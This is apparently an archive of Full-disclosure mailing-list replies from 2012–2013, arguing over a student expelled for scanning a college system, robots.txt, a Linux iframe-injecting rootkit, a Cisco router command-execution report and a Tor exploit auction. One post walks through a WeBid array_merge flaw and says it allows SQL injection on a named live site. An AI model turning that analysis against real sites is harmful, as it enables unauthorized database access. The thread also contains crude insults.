> software. Adding input sanitization would increase the code size by a lot
> and obscure the concept somewhat (not that there is much to be said about
> the concept though). Think we can give the dude some discount for that.
>
> Nevertheless, seeing something like this coming from "Certified Ethical
> Hacker and Security + certified" makes me doubt the worthness of those
> certificates. Could be nice to know the exact naming of those certificates
> to properly disregard them in the future.
>
> With best regards,
> Z.
>
> 2013/3/6 laurent gaffie 
>
>>
>> http://resources.infosecinstitute.com/php-build-your-own-mini-port-scanner/
>>
>> Finding the vulnerability in this code is left as an exercise to the
>> reader.
>>
>> PS: "*Your comment will be awaiting moderation forever."*
>>
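
Added example (not part of the thread, and not code from the linked tutorial): the amount of input validation a form-driven PHP port scanner needs, which is the point argued above. The parameter names host, from and to, the 64-port cap and the sample inputs are assumptions made for illustration.

```php
<?php
// Added illustration; not code from the tutorial discussed in the thread.
// Assumed request parameters: host, from, to.

const MAX_PORTS_PER_REQUEST = 64; // assumed cap on ports per request

/**
 * Return a normalised ['host', 'from', 'to'] array, or throw.
 * The caller uses nothing from $in until this has succeeded.
 */
function validate_scan_request(array $in): array
{
    $host = $in['host'] ?? null;
    if (!is_string($host)) {
        // Rejects a missing value and array input such as host[]=x.
        throw new InvalidArgumentException('host is required');
    }
    $host = trim($host);

    // Accept a literal IP address or a syntactically valid hostname only.
    $isIp   = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $isName = filter_var($host, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false;
    if (!$isIp && !$isName) {
        throw new InvalidArgumentException('host must be an IP address or a hostname');
    }

    // Ports must be whole numbers in the valid TCP range.
    $opts = ['options' => ['min_range' => 1, 'max_range' => 65535]];
    $from = filter_var($in['from'] ?? null, FILTER_VALIDATE_INT, $opts);
    $to   = filter_var($in['to'] ?? null, FILTER_VALIDATE_INT, $opts);
    if ($from === false || $to === false) {
        throw new InvalidArgumentException('ports must be integers from 1 to 65535');
    }
    if ($from > $to) {
        throw new InvalidArgumentException('from must not be greater than to');
    }
    if ($to - $from + 1 > MAX_PORTS_PER_REQUEST) {
        throw new InvalidArgumentException('port range too large');
    }

    return ['host' => $host, 'from' => $from, 'to' => $to];
}

// Constructed sample inputs, shaped as they would arrive in $_GET.
$samples = [
    ['host' => '192.0.2.10',   'from' => '20',    'to' => '25'],
    ['host' => 'example.test', 'from' => '80',    'to' => '80'],
    ['host' => 'not a host!',  'from' => '1',     'to' => '10'],
    ['host' => ['x'],          'from' => '1',     'to' => '10'],
    ['host' => '192.0.2.10',   'from' => '80abc', 'to' => '90'],
    ['host' => '192.0.2.10',   'from' => '1',     'to' => '65535'],
];

foreach ($samples as $sample) {
    try {
        $req = validate_scan_request($sample);
        // Only validated, typed values are echoed back.
        printf("accept %s %d-%d\n", $req['host'], $req['from'], $req['to']);
    } catch (InvalidArgumentException $e) {
        // Print our own fixed message, escaped; never the raw input.
        echo 'reject: ', htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8'), "\n";
    }
}
```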

Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000

2013-01-27 Thread Benji
Arbitrary moral compass? Amazing.

Please, explain the morals behind finding a bug, reporting it, getting a slap
on the wrist, and then running a vuln scanner against the site? If his true
intent was to see if it was fixed, I would suggest that he checked it with the
finesse, logic and precision that I would expect from a baby with a hammer.

Morals would tell you to ask, logic would tell you to ask, common sense would
tell you to ask before the last step, especially after being told off and
AGREEING to the college's code of conduct aka morals. If he didn't agree with
them he shouldn't have agreed to them.

'My bank's interest rates seem immoral, I will only pay 6%'. Let me know how
that logic works out for you.

Pretending that this guy is more than an idiot is astounding.

Do you want your university students to follow the law, or does the law not 
matter if the morals behind it are fine in someone's opinion?

'I robbed the bank and shot the guard, but don't worry it was to keep up on my 
mortgage payments to house my family'

Who uses Acunetix anyway?

As far as I can tell, this argument is now debating opinion which is inherently 
stupid. 

Sent from my lack of morals, and about 3 cans of taurine/caffeine


On 25 Jan 2013, at 22:29, Dan Ballance  wrote:

> My point being, a degree in computer science should reflect the student's
> ability in computer science - not compliance with some arbitrary moral compass
> dreamt up in a university board somewhere.
>
> Who gave these university bureaucrats the power to exclude this young person
> from the education system?  Why is their moral compass deemed to be correct?
> I thought university lecturers held positions due to their talents in their
> respective subjects - not because of their ability to implement social
> policy?
> 
> On 25 Jan 2013 17:40, "Jeffrey Walton"  wrote:
>> On Fri, Jan 25, 2013 at 12:07 PM,   wrote:
>> > On Fri, 25 Jan 2013 09:57:51 +, Dan Ballance said:
>> >
>> >> ...
>> >
>> > Doesn't matter if he ends up a corporate knob or a freedom fighter.  If
>> > he says "I promise to XYZ" you want him to be trustworthy on said promise.
>> >
>> > You might want to ask the guys in Anonymous who got ratted out by one
>> > of their own how they feel about the word "trustworthy" regarding the
>> > rat who said "I promise not to rat you out".
>> :)
>> 
>> There is no honor among thieves (or corporations, or lawyers, or...)

Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000

2013-01-22 Thread Benji
Someone please explain to me why he had to run a vulnerability scanner to
check one vulnerability, and again, how are we still arguing about this?
Whether you think he had a 'right' to test this or not, he was either too
dumb or too naive to know it was against the law.

If anyone would like to start arguing whether it's against the (Canadian)
law:

Section 342.1[4]

Unauthorized use of computer is often used to lay charges for hacker or
someone who is involved in computer related offences. This section states:

Every one who, fraudulently and without colour of right,
 (a) obtains, directly or indirectly, any computer service,
 (b) by means of an electro-magnetic, acoustic, mechanical or other
 device, intercepts or causes to be intercepted, directly or indirectly, any
 function of a computer system,

I would suggest he broke section (b) and you could argue (a).

On Tue, Jan 22, 2013 at 3:46 AM, Nick FitzGerald
wrote:

> Sanguinarious Rose to me:
>
> > And that is the reason why no one wants to report anything they find,
> > it's because of people like you and your kind of thinking.
>
> As you seem to have assumed a whole bunch about "my kind of thinking"
> that I did not put in the original post, I find the above laughable.
>
> > Did they publicly post all the private information?
> > No
>
> Agreed.
>
> > Did they try to use it for malicious or illicit purposes?
> > No
>
> Not that we know from what seems to be a rather one-sided, self-serving
> to the victim, "the system screwed poor little me" telling of the
> story.
>
> > Did they report it when they found it?
> > Yes
>
> Agreed.
>
> > A horrible moral compass indeed!  ...
>
> No -- I said nothing about what could or should be considered about
> their moral compass _in finding_ the problem.  I did say they probably
> broke _both_ school/other ToS agreements and unauthorized access laws,
> but I did not say what I felt about that.
>
> It is often the case that minor transgressions of such nature are
> necessary in doing many useful things in the computer security domain.
> That alone makes it precarious territory in which to work and such
> issues should obviously be front-of-mind for _anyone_ potentially in
> such territory.
>
> > ...  Arrest these people for being
> > concerned and reporting it after stumbling upon security flaws!
> > Amiright?
>
> No, I did not say that either.
>
> What you seem to have missed (other than that you are reading things
> into my previous post that are not there) was that _after_ these two
> students notified the relevant system owners/operators and/or vendors,
> apparently only _one_ of them went back and did stuff that he probably
> should not have originally done (but that we can _probably_ excuse
> because of a "greater good"), _again_.
>
> _That_ is what tells us something critical about _his_ moral compass
> (either he does not have one, it is rather under-developed for a 20-
> year old or it is rather broken).
>
> Did you notice that this story was not titled "Youths expelled..." or
> "Students expelled..." _despite_ the first sentence of any substance in
> the National Post article starting:
>
>Ahmed Al-Khabaz ... was working on a mobile app ... when he and a
>colleague discovered what he describes as "sloppy coding" in ...
>
> Did you notice how the rest of story fails to mention that his
> colleague was expelled?
>
> Poor journalism, missing a fairly major fact in the story?
>
> Or perhaps evidence that his "colleague" was not expelled because his
> colleague did not continue to mess with stuff that he should have (now)
> known he should not be messing with?
>
> If _both_ students had been expelled, surely the tone of indignation
> and righteousness would have been greater, so I doubt the fact that the
> article only talks of one student being expelled is due to journalistic
> oversight...
>
> So, Mr Rose, do you now see what you chose to avoid noticing on your
> first pass through this story and its "clever hacker cruelly
> ostracized" skew?
>
>
>
> Regards,
>
> Nick FitzGerald
>
>

Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000 students personal data

2013-01-21 Thread Benji
He found the vulnerability by running Acunetix against the system. He is
what most would describe as, a class A moron.


On Mon, Jan 21, 2013 at 8:43 PM, Frank Bures wrote:

> A student has been expelled from Montreal’s Dawson College after he
> discovered a flaw in the computer system used by most Quebec CEGEPs
> (General and Vocational Colleges), one which compromised the security of
> over 250,000 students’ personal information.
>
> Ahmed Al-Khabaz, a 20-year-old computer science student at Dawson and a
> member of the school’s software development club, was working on a mobile
> app to allow students easier access to their college account when he and a
> colleague discovered what he describes as “sloppy coding” in the widely
> used Omnivox software which would allow “anyone with a basic knowledge of
> computers to gain access to the personal information of any student in the
> system, including social insurance number, home address and phone number,
> class schedule, basically all the information the college has on a
> student.”
>
> http://tinyurl.com/bcdrelh
>
> Cheers
> Frank
>

Re: [Full-disclosure] Are software cracks also a form of security vulnerabilities?

2013-01-17 Thread Benji
On Thu, Jan 17, 2013 at 9:20 AM, COPiOUS  wrote:

> In my opinion they are, since a software crack allows unauthorized use of
> software and the exposure of (possible) trade secrets


How is this possible with a cracked app but not one that isn't cracked?

Re: [Full-disclosure] BF, CSRF, and IAA vulnerabilities in websecurity.com.ua

2013-01-01 Thread Benji
I was asking for your opinion.


On Tue, Jan 1, 2013 at 7:31 PM, some one  wrote:

> If you reread what i posted you will see that i do not give my opinion on
> the quality of his posts. I will keep that to myself, I just state that its
> better than dudes (and your) troll posts.
>
> Regards
> On Jan 1, 2013 3:04 PM, "Benji"  wrote:
>
>> So you would say, that you find the things he posts "of interest"?
>>
>> Please expand on how and why anti automation bugs in unknown cms's are
>> "of interest"?
>>
>>
>> On Mon, Dec 31, 2012 at 11:58 PM, some one wrote:
>>
>>> If you do not like or find of interest what the guy posts is it not
>>> easier to just press delete or filter him out rather than try to make fun
>>> of him?
>>>
>>> Give the dude a break man, hes submitting more things of interest than
>>> you are and you just make yourself sound bitter and twisted.
>>>
>>> Its new year man, go out and drink a beer or eat some fireworks
>>> On Dec 31, 2012 5:17 PM, "Julius Kivimäki" 
>>> wrote:
>>>
>>>> Hello list!
>>>>
>>>> I want to warn you about multiple extremely severe vulnerabilities in
>>>> websecurity.com.ua.
>>>>
>>>> These are Brute Force and Insufficient Anti-automation vulnerabilities
>>>> in websecurity.com.ua. These vulnerability is very serious and could
>>>> affect million of people.
>>>>
>>>> -
>>>> Affected products:
>>>> -
>>>>
>>>> Vulnerable are all versions of websecurity.com.ua.
>>>>
>>>> --
>>>> Details:
>>>> --
>>>>
>>>> Brute Force (WASC-11):
>>>>
>>>> In ftp server (websecurity.com.ua:21) there is no protection from
>>>> Brute Force
>>>> attacks.
>>>>
>>>> Cross-Site Request Forgery (WASC-09):
>>>>
>>>> Lack of captcha in login form (http://websecurity.com.ua:21/) can be
>>>> used for
>>>> different attacks - for CSRF-attack to login into account (remote login
>>>> - to
>>>> conduct attacks on vulnerabilities inside of account), for automated
>>>> entering into account, for phishing and other automated attacks. Which
>>>> you
>>>> can read about in the article "Attacks on unprotected login forms"
>>>> (
>>>> http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html
>>>> ).
>>>>
>>>> Insufficient Anti-automation (WASC-21):
>>>>
>>>> In login form there is no protection against automated request, which
>>>> allow
>>>> to picking up logins in automated way by attacking on login function.
>>>> 
>>>> Timeline:
>>>> 
>>>>
>>>> 2012.06.28 - announced at my site about websecurity.com.ua.
>>>> 2012.06.28 - informed developers about the first part of
>>>> vulnerabilities in
>>>> websecurity.com.ua.
>>>> 2012.06.30 - informed developers about the second part of
>>>> vulnerabilities in
>>>> websecurity.com.ua.
>>>> 2012.07.26 - announced at my site about websecurity.com.ua.
>>>> 2012.07.28 - informed developers about vulnerabilities in
>>>> websecurity.com.ua
>>>> and reminded about previous two letters I had sent to them with carrier
>>>> pigeons.
>>>> 2012.07.28-2012.10.31 - multiple attempts to contact the owners of
>>>> websecurity.com.ua
>>>> were ignored by the owners.
>>>> 2012.11.02 - developers responded "fuck off and kill urself irl!".
>>>> 2012.12.31 - disclosed on the list
>>>>
>>>> Best wishes & regards,
>>>> MustLive
>>>> Security master extraordinaire, master sysadmin
>>>> http://websecurity.com.ua
>>>>

Re: [Full-disclosure] BF, CSRF, and IAA vulnerabilities in websecurity.com.ua

2013-01-01 Thread Benji
So you would say, that you find the things he posts "of interest"?

Please expand on how and why anti automation bugs in unknown cms's are "of
interest"?


On Mon, Dec 31, 2012 at 11:58 PM, some one wrote:

> If you do not like or find of interest what the guy posts is it not easier
> to just press delete or filter him out rather than try to make fun of him?
>
> Give the dude a break man, hes submitting more things of interest than you
> are and you just make yourself sound bitter and twisted.
>
> Its new year man, go out and drink a beer or eat some fireworks
> On Dec 31, 2012 5:17 PM, "Julius Kivimäki" 
> wrote:
>
>> Hello list!
>>
>> I want to warn you about multiple extremely severe vulnerabilities in
>> websecurity.com.ua.
>>
>> These are Brute Force and Insufficient Anti-automation vulnerabilities
>> in websecurity.com.ua. These vulnerability is very serious and could
>> affect million of people.
>>
>> -
>> Affected products:
>> -
>>
>> Vulnerable are all versions of websecurity.com.ua.
>>
>> --
>> Details:
>> --
>>
>> Brute Force (WASC-11):
>>
>> In ftp server (websecurity.com.ua:21) there is no protection from Brute
>> Force
>> attacks.
>>
>> Cross-Site Request Forgery (WASC-09):
>>
>> Lack of captcha in login form (http://websecurity.com.ua:21/) can be
>> used for
>> different attacks - for CSRF-attack to login into account (remote login -
>> to
>> conduct attacks on vulnerabilities inside of account), for automated
>> entering into account, for phishing and other automated attacks. Which you
>> can read about in the article "Attacks on unprotected login forms"
>> (
>> http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html
>> ).
>>
>> Insufficient Anti-automation (WASC-21):
>>
>> In login form there is no protection against automated request, which
>> allow
>> to picking up logins in automated way by attacking on login function.
>> 
>> Timeline:
>> 
>>
>> 2012.06.28 - announced at my site about websecurity.com.ua.
>> 2012.06.28 - informed developers about the first part of vulnerabilities
>> in
>> websecurity.com.ua.
>> 2012.06.30 - informed developers about the second part of vulnerabilities
>> in
>> websecurity.com.ua.
>> 2012.07.26 - announced at my site about websecurity.com.ua.
>> 2012.07.28 - informed developers about vulnerabilities in
>> websecurity.com.ua
>> and reminded about previous two letters I had sent to them with carrier
>> pigeons.
>> 2012.07.28-2012.10.31 - multiple attempts to contact the owners of
>> websecurity.com.ua
>> were ignored by the owners.
>> 2012.11.02 - developers responded "fuck off and kill urself irl!".
>> 2012.12.31 - disclosed on the list
>>
>> Best wishes & regards,
>> MustLive
>> Security master extraordinaire, master sysadmin
>> http://websecurity.com.ua
>>

Re: [Full-disclosure] Selling Exploit on Deep Web

2012-12-21 Thread Benji
Not your website. The website you were somehow accusing of being shit based
on its lack of interesting information when obviously hacktalk is a
plethora of information, expertise and semen samples.


On Fri, Dec 21, 2012 at 2:44 PM, Luis Santana  wrote:

> Lulz? Sorry bro but uh, the main page runs SMF not WeBid so I'm not really
> too sure where you pulled that from. Good job though, maybe santa will give
> you some of his cookies for your effort.
>
>
> On Dec 21, 2012, at 5:26 AM, Benji  wrote:
>
> Also genius, I know you're quick to kick things down because you are
> inept. However, I'd say after my whole 10 minute review of that code and a
> simple check with PHP that, that site is vulnerable to SQLi and by the look
> of it.
>
> If we take a look at latest WeBid code, specifically selleremails.php, we
> see them doing an array_merge from $_POST to $user>user_data (user_data
> being a trusted array it would appear).
>
> include 'includes/common.inc.php';
>
> if (!$user->is_logged_in())
> {
>     $_SESSION['REDIRECT_AFTER_LOGIN'] = 'selleremails.php';
>     header('location: user_login.php');
>     exit;
> }
>
> // Create new list
> if (isset($_POST['action']) && $_POST['action'] == 'update')
> {
>     $query = "UPDATE " . $DBPrefix . "users SET endemailmode = '" . $system->cleanvars($_POST['endemailmod']) . "',
>         startemailmode = '" . $system->cleanvars($_POST['startemailmod']) . "',
>         emailtype = '" . $system->cleanvars($_POST['emailtype']) . "' WHERE id = " . $user->user_data['id'];
>     $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);
>     $ERR = $MSG['25_0192'];
>     $user->user_data = array_merge($user->user_data, $_POST); // update the array
> }
>
> After staying up all night and working through this code, I came up with
> this test case:
> <?php
> $array1 = array("color" => "red");
> $array2 = array("color" => "test");
> $result = array_merge($array1, $array2);
> print_r($result);
> ?>
> Array
> (
>     [color] => test
> )
>
> So as we can overwrite any array value, we have SQLi across the
> application. Maybe a first 0day for hacktalk.net?
>
> I will take your 'hella l33t', print it out, and then shit on it.
>
> Suck my dick.
>
>
> On Fri, Dec 21, 2012 at 10:12 AM, Benji  wrote:
>
>> You say "n00bz" welcome, where is my assistance and the warm atmosphere
>> to embrace me into the world of script kiddy-ism? Oh, and the obvious
>> literary genius.
>>
>>
>> On Fri, Dec 21, 2012 at 8:25 AM, Luis Santana wrote:
>>
>>> Hella l33t bro, you can read an email address. Much propz
>>>
>>>
>>> On Dec 21, 2012, at 3:22 AM, Benji  wrote:
>>>
>>> in other news, have you heard of the super cool site hacktalk.net where
>>> they almost have 1000 members?
>>>
>>>
>>> On Thu, Dec 20, 2012 at 3:13 PM, Luis Santana wrote:
>>>
>>>> Not a single fucking exploit on the entire site. gg sir, gg
>>>>
>>>>
>>>> On Dec 10, 2012, at 2:17 PM, tig3rh...@tormail.org wrote:
>>>>
>>>> > In Deep Web has created a new online site a few days ago that allows you
>>>> > to sell even exploits, malware, etc. etc..
>>>> > The site works like Ebay so everything is auctioned.
>>>> >
>>>> > you can get from tor: http://qatuopo4wmzkirlo.onion
>>>> >
>>>> > Or by proxy (tor2web): https://qatuopo4wmzkirlo.tor2web.org
>>>> >

Re: [Full-disclosure] Selling Exploit on Deep Web

2012-12-21 Thread Benji
You say "n00bz" welcome, where is my assistance and the warm atmosphere to
embrace me into the world of script kiddy-ism? Oh, and the obvious literary
genius.


On Fri, Dec 21, 2012 at 8:25 AM, Luis Santana  wrote:

> Hella l33t bro, you can read an email address. Much propz
>
>
> On Dec 21, 2012, at 3:22 AM, Benji  wrote:
>
> in other news, have you heard of the super cool site hacktalk.net where
> they almost have 1000 members?
>
>
> On Thu, Dec 20, 2012 at 3:13 PM, Luis Santana wrote:
>
>> Not a single fucking exploit on the entire site. gg sir, gg
>>
>>
>> On Dec 10, 2012, at 2:17 PM, tig3rh...@tormail.org wrote:
>>
>> > In Deep Web has created a new online site a few days ago that allows you
>> > to sell even exploits, malware, etc. etc..
>> > The site works like Ebay so everything is auctioned.
>> >
>> > you can get from tor: http://qatuopo4wmzkirlo.onion
>> >
>> > Or by proxy (tor2web): https://qatuopo4wmzkirlo.tor2web.org
>> >

Re: [Full-disclosure] Selling Exploit on Deep Web

2012-12-21 Thread Benji
Also genius, I know you're quick to kick things down because you are inept.
However, I'd say after my whole 10 minute review of that code and a simple
check with PHP that, that site is vulnerable to SQLi and by the look of it.

If we take a look at latest WeBid code, specifically selleremails.php, we
see them doing an array_merge from $_POST to $user->user_data (user_data
being a trusted array it would appear).

include 'includes/common.inc.php';

if (!$user->is_logged_in())
{
    $_SESSION['REDIRECT_AFTER_LOGIN'] = 'selleremails.php';
    header('location: user_login.php');
    exit;
}

// Create new list
if (isset($_POST['action']) && $_POST['action'] == 'update')
{
    $query = "UPDATE " . $DBPrefix . "users SET endemailmode = '" . $system->cleanvars($_POST['endemailmod']) . "',
        startemailmode = '" . $system->cleanvars($_POST['startemailmod']) . "',
        emailtype = '" . $system->cleanvars($_POST['emailtype']) . "' WHERE id = " . $user->user_data['id'];
    $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);
    $ERR = $MSG['25_0192'];
    $user->user_data = array_merge($user->user_data, $_POST); // update the array
}

After staying up all night and working through this code, I came up with
this test case:
<?php
$array1 = array("color" => "red");
$array2 = array("color" => "test");
$result = array_merge($array1, $array2);
print_r($result);
?>
Array
(
    [color] => test
)

So as we can overwrite any array value, we have SQLi across the
application. Maybe a first 0day for hacktalk.net?

I will take your 'hella l33t', print it out, and then shit on it.

Suck my dick.


On Fri, Dec 21, 2012 at 10:12 AM, Benji  wrote:

> You say "n00bz" welcome, where is my assistance and the warm atmosphere to
> embrace me into the world of script kiddy-ism? Oh, and the obvious literary
> genius.
>
>
> On Fri, Dec 21, 2012 at 8:25 AM, Luis Santana wrote:
>
>> Hella l33t bro, you can read an email address. Much propz
>>
>>
>> On Dec 21, 2012, at 3:22 AM, Benji  wrote:
>>
>> in other news, have you heard of the super cool site hacktalk.net where
>> they almost have 1000 members?
>>
>>
>> On Thu, Dec 20, 2012 at 3:13 PM, Luis Santana wrote:
>>
>>> Not a single fucking exploit on the entire site. gg sir, gg
>>>
>>>
>>> On Dec 10, 2012, at 2:17 PM, tig3rh...@tormail.org wrote:
>>>
>>> > In Deep Web has created a new online site a few days ago that allows you
>>> > to sell even exploits, malware, etc. etc..
>>> > The site works like Ebay so everything is auctioned.
>>> >
>>> > you can get from tor: http://qatuopo4wmzkirlo.onion
>>> >
>>> > Or by proxy (tor2web): https://qatuopo4wmzkirlo.tor2web.org
>>> >
>>>
>>
>>
>>
>
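Added example (not part of the original post and not WeBid's code): the array_merge() behaviour from the test case above, applied to a stand-in for $user->user_data, next to an allow-listed merge and an integer check on the id before it reaches the SQL text. The function names and all sample values are constructed for illustration.

```php
<?php
// Added example, not WeBid code. $trusted stands in for $user->user_data and
// $post for $_POST; function names and sample values are constructed.

/** The pattern in the quoted selleremails.php: merge every request key. */
function merge_unfiltered(array $trusted, array $post): array
{
    // For string keys array_merge() keeps the value from the later array,
    // so any key the client sends replaces the server-side value.
    return array_merge($trusted, $post);
}

/** Hardened merge: accept only the fields this form is meant to change. */
function merge_allow_listed(array $trusted, array $post, array $allowed): array
{
    $accepted = array_intersect_key($post, array_flip($allowed));
    // emailtype[]=x arrives as an array; keep plain strings only.
    $accepted = array_filter($accepted, 'is_string');
    return array_merge($trusted, $accepted);
}

/** Tail of the UPDATE as the quoted code builds it: id concatenated unquoted. */
function where_clause_concat(array $userData): string
{
    return 'WHERE id = ' . $userData['id'];
}

/** Same clause, but the id must validate as a positive integer first. */
function where_clause_checked(array $userData): string
{
    $id = filter_var(
        $userData['id'],
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false) {
        throw new InvalidArgumentException('user id is not a positive integer');
    }
    return 'WHERE id = ' . $id;
}

// Constructed session state and request body.
$trusted = ['id' => 17, 'nick' => 'seller', 'emailtype' => 'html'];
$post    = ['action' => 'update', 'emailtype' => 'text', 'id' => '999'];
$fields  = ['endemailmod', 'startemailmod', 'emailtype'];

$unfiltered = merge_unfiltered($trusted, $post);
$filtered   = merge_allow_listed($trusted, $post, $fields);

echo "unfiltered: ", where_clause_concat($unfiltered), "\n";
echo "allow-list: ", where_clause_concat($filtered), "\n";

// A non-numeric id is rejected before any SQL text is built.
try {
    echo where_clause_checked(['id' => 'seventeen']), "\n";
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

Binding the id as a query parameter removes the concatenation altogether; the integer check is shown because the quoted code uses the legacy mysql_query() API, which has no prepared statements.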

Re: [Full-disclosure] Selling Exploit on Deep Web

2012-12-21 Thread Benji
in other news, have you heard of the super cool site hacktalk.net where
they almost have 1000 members?


On Thu, Dec 20, 2012 at 3:13 PM, Luis Santana  wrote:

> Not a single fucking exploit on the entire site. gg sir, gg
>
>
> On Dec 10, 2012, at 2:17 PM, tig3rh...@tormail.org wrote:
>
> > In Deep Web has created a new online site a few days ago that allows you
> > to sell even exploits, malware, etc. etc..
> > The site works like Ebay so everything is auctioned.
> >
> > you can get from tor: http://qatuopo4wmzkirlo.onion
> >
> > Or by proxy (tor2web): https://qatuopo4wmzkirlo.tor2web.org
> >

Re: [Full-disclosure] Google's robots.txt handling

2012-12-11 Thread Benji
What we need is a robots2.txt that defines what users are allowed to access
the robots.txt file.

Problem solved.


On Mon, Dec 10, 2012 at 11:33 PM, Gynvael Coldwind wrote:

> Hey,
>
> > > Here is an example:
> > >
> > > An admin has a public webservice running with folders containing
> > > sensitive information. Enter these folders in his robots.txt and
> > > "protect" them from the indexing process of spiders. As he doesn't
> > > want the /admin/ gui to appear in the search results he also puts his
> > > /admin in the robots text and finally makes a backup to the folder
> > > /backup.
>
> If no one would know about a folder, why would one add it to
> robots.txt in the first place?
> But that's missing the point anyway - robots.txt is not a security
> mechanism.
> If someone uses robots.txt as the only and last line of defense he
> plainly doesn't understand what he's doing (especially that it's one
> of the first files both pentesters & attackers look at).
>
> If someone has an /admin/ site (which is a really easily guessable
> name, checked by every web directory scanner out there) he cannot rely
> on concealment*, but on proper user authentication using mechanisms
> designed for such purpose (e.g. requiring a password).
>
> (* for historical reasons there is a Polish IT term for such attempts
> - "deep hiding", there's even a wiki page on that -
> http://pl.wikipedia.org/wiki/G%C5%82%C4%99bokie_ukrycie)
>
> > I'm wondering if, in perhaps .htaccess, one could allow ONLY site
> > crawlers access to the robots.txt file.  Then add robots.txt to
> > robots.txt...would this mitigate some of the risk?
>
> 1. It's still missing the point.
> 2. No, it wouldn't work in case of scanners that try to impersonate robots.
> --
> gynvael.coldwind//vx
>

Re: [Full-disclosure] linux rootkit in combination with nginx

2012-11-27 Thread Benji
Yup, this is most likely. 

Sent from my iPhone

On 27 Nov 2012, at 15:41, "Gregor S."  wrote:

> More interesting than the rootkit itself is how it found its way into the
> box.
>
> Chances are that Squeeze has a non-disclosed 0day, and that's worrying me a
> bit...
> 
> 
> On Mon, Nov 26, 2012 at 11:04 AM, dxp  wrote:
>> Looks like a new rootkit according to Kaspersky [1] and some analysis 
>> released by CrowdStrike [2].
>> 
>> [1] 
>> https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections
>> [2] 
>> http://blog.crowdstrike.com/2012/11/http-iframe-injecting-linux-rootkit.html
>> 
>> PS: Interesting to know if others found this on their servers or is this an 
>> isolated incident !?
>> 
>> 
>> On Tue, Nov 13, 2012 at 10:19 AM, stack trace  wrote:
>>> Hi there,
>>> 
>>> We've discovered something which looks to us like a rootkit working 
>>> together with proxy software like nginx. Our OS is debian squeeze and nginx 
>>> 1.2.3.
>>> 
>>> Here is what happened:
>>> 
>>> We are running a web service and we got notified by some customers of us 
>>> that they are getting redirected to some malicious sites. Somehow a hacker 
>>> managed to inject an iframe into our http responses. 
>>> 
>>> I tried to do a telnet test on our nginx proxy and saw that even the "bad 
>>> request" response which gets served directly from nginx contained the 
>>> malicious iframe code.
>>> 
>>> server {
>>> listen  80 default backlog=2048;
>>> listen  443 default backlog=2048 ssl;
>>> server_name _;
>>> access_log  off;
>>> (...)
>>> location / {
>>> return  400;
>>> }
>>> }
>>> 
>>> Doing a bad request nginx doesn't go to cache in this case - the "return 
>>> 400" makes nginx reply with a predefined response (a string in memory). 
>>> 
>>> Even this response contained an iframe like this:
>>> HTTP/1.1 400 Bad Request
>>> Server: nginx/1.2.3
>>> Date: Wed, 07 Nov 2012 00:01:24 GMT
>>> Content-Type: text/html
>>> Content-Length: 353
>>> Connection: close
>>> 
>>> 
>>> 400 Bad Request
>>> 

Re: [Full-disclosure] Remote Command Execution on Cisco WAG120N

2012-11-26 Thread Benji
Command execution through Dynamic DNS setup is quite clearly not expected
functionality.


On Mon, Nov 26, 2012 at 11:28 AM, Gary Driggs  wrote:

> On Nov 26, 2012, at 1:47 AM, "Julius Kivimäki"
>  wrote:
>
> > Is a privilege escalation vulnerability in Linux not a vulnerability if
> it requires authentication?
>
> It was not made clear that it was a privilege escalation...
> "Authenticate and browse to /setup.cgi? ... All the fields you see are
> vulnerables to command execution as root." So what kind of credentials
> are used for the initial authentication? Unprivileged? Then it should
> be mentioned as such. Otherwise, I can point out a few dozen embedded
> systems with web UIs that allow me to make configuration changes after
> authentication because that's why they're there. Now if you can point
> out a way to bypass authentication or escalate privileges from an
> account that doesn't normally have write access, you've got a
> vulnerability. I was merely asking how this differed from any other
> auth wall.
>
> -Gary
>

Re: [Full-disclosure] phpmyadmin compromised?

2012-11-19 Thread Benji
.. could you have provided any less information? why don't you look through
your code instead of emailing a screenshot to a mailing list? really?


On Mon, Nov 19, 2012 at 4:47 PM, Benji  wrote:

> .. coul
>
>
> On Mon, Nov 19, 2012 at 4:45 PM, Lucio Crusca  wrote:
>
>> Hello *,
>>
>> I've setup my browser to remember login & password at my server phpmyadmin
>> login page. It usually fills the two fields correctly, but today it showed
>> this crap instead:
>>
>>
>> http://img208.imagevenue.com/img.php?image=38933_php_myadmin_compromised_122_430lo.jpg
>>
>> Since I've already suffered a security breach through phpmyadmin in the
>> past, I immediately suspected another one. Please note that phpmyadmin is
>> shielded by http digest authentication since the previous accident.
>>
>> Are you aware of any security problems related to phpmyadmin (or to
>> Iceweasel 10 for that matter) that can cause such garbage on the login
>> page?
>>
>> Thanks in advance
>> Lucio.
>>
>>
>>
>>

Re: [Full-disclosure] phpmyadmin compromised?

2012-11-19 Thread Benji
.. coul


On Mon, Nov 19, 2012 at 4:45 PM, Lucio Crusca  wrote:

> Hello *,
>
> I've setup my browser to remember login & password at my server phpmyadmin
> login page. It usually fills the two fields correctly, but today it showed
> this crap instead:
>
>
> http://img208.imagevenue.com/img.php?image=38933_php_myadmin_compromised_122_430lo.jpg
>
> Since I've already suffered a security breach through phpmyadmin in the
> past, I immediately suspected another one. Please note that phpmyadmin is
> shielded by http digest authentication since the previous accident.
>
> Are you aware of any security problems related to phpmyadmin (or to
> Iceweasel 10 for that matter) that can cause such garbage on the login
> page?
>
> Thanks in advance
> Lucio.
>
>
>
>

Re: [Full-disclosure] Skype account + IM history hijack vulnerability

2012-11-15 Thread Benji
I'll make one point. Google 'oracle attack'. The only result that comes up 
related to your naming meaning is the one posted here. The rest are the obvious 
examples.

But whatever, you seem to be vulnerable to the one d eye oh 7 vulnerability.

Sent from my iPhone

On 15 Nov 2012, at 18:59, klondike  wrote:

> On 15/11/12 09:47, Benji wrote:
